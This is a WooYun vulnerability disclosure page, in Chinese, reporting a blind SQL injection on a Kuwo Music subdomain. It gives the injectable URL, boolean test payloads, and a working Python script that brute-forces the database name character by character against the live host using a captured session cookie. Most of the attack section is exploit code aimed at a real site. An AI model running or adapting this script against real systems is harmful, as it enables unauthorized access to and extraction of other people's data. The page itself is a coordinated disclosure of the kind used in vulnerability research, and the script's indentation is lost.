当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143946

漏洞标题:酷我音乐某站点MySQL盲注漏洞(附脚本)

相关厂商:酷我音乐

漏洞作者: 路人甲

提交时间:2015-09-28 18:39

修复时间:2015-11-12 18:42

公开时间:2015-11-12 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-09-28: 厂商已经确认,细节仅向厂商公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

酷我音乐某站点MySQL盲注漏洞(附脚本)

详细说明:

http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 and 1=1&pn=1时显示正常
http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 and 1=2&pn=1时显示异常
初步判断存在sql注入
然后判断数据库length

sql0.png


sql1.png


判断出length长度为6
然后写出python脚本跑出数据库名
MySQL datebase is EDITOR

sql2.png


import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
'Cookie': 'JSESSIONID=A3ACA96255E89C35F831053FF724AA08.jvm1; Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1443063561,1443423338; ad_dist=%25B1%25B1%25BE%25A9; Hm_lvt_e284bf2752adf1dcac2ccfce9efc2243=1443422143; Hm_lpvt_e284bf2752adf1dcac2ccfce9efc2243=1443430342; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1443425671',
}
print 'start to retrive MySQL datebase():'
database = ''
for n in range(1,7):
for i in range(33,127):
site='http://mboxspace.kuwo.cn'
s = 'http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 and ascii(substring((database()),%s,1))=%s&pn=1' % (n,i)
url=site+s
response=urllib.urlopen(s)
the_page = response.read()
response.close()
if '3973184' in the_page:
database += chr(i)
print '\n[in progress]', database,
break
print '\n[Done]MySQL datebase is', database

漏洞证明:

sql2.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-09-28 18:40

厂商回复:

感谢对酷我的支持

最新状态:

暂无